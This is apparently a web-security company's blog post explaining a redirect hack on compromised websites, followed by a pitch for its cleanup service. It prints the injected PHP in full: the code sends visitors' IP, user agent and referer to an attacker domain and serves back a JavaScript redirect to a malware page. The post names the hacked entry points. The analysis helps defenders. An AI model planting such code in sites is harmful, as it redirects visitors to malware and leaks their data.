Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?
Over the last few days we’ve been getting this question often and it means that your site has been hacked and compromised. Basically the attackers added a code similar to this to your site:
$url = “http://moneygram-tracking.com/cabl/ws/12/request.php?ip=”.$_SERVER[‘REMOTE_ADDR’].”&useragent=”.urlencode($_SERVER[‘HTTP_USER_AGENT’]).”&referer=”.urlencode($_SERVER[“HTTP_REFERER”]);
$answer = file_get_contents($url);
if (strpos($answer,”noredirect”) === false) {
echo $answer;
}
What this code does is to access moneygram-tracking.com and check if your IP has visited it before. If it has not, it will redirect your site to a malware-infected page (or to some page full of ads). If you have visited it already, it will do nothing.
This is where you get redirected the first time:
window.location = “http://df9828239y82383u9823y9d22y.superdip.com.tw/main.php?page=fc3e77a595495932″;
Other times it will just return “noredirect” and you can visit your site safely…
How are the sites getting hacked like that?
So far, we are seeing sites getting hacked through the Timthumb.php vulnerability, through Uploadify and through outdated web applications (WordPress, Joomla and VBulletin).
How many sites are compromised?
A lot. If you search on Google for “file_get_contents(http://moneygram-tracking.com”, you will find almost 1 thousand sites that generated that error while Google was indexing it. So the number of compromised sites is probably a lot higher than that.
I need help!
If you need help cleaning it up, sign up with us here: Sucuri Signup and we will get it fixed / secured for you.
Leave a reply
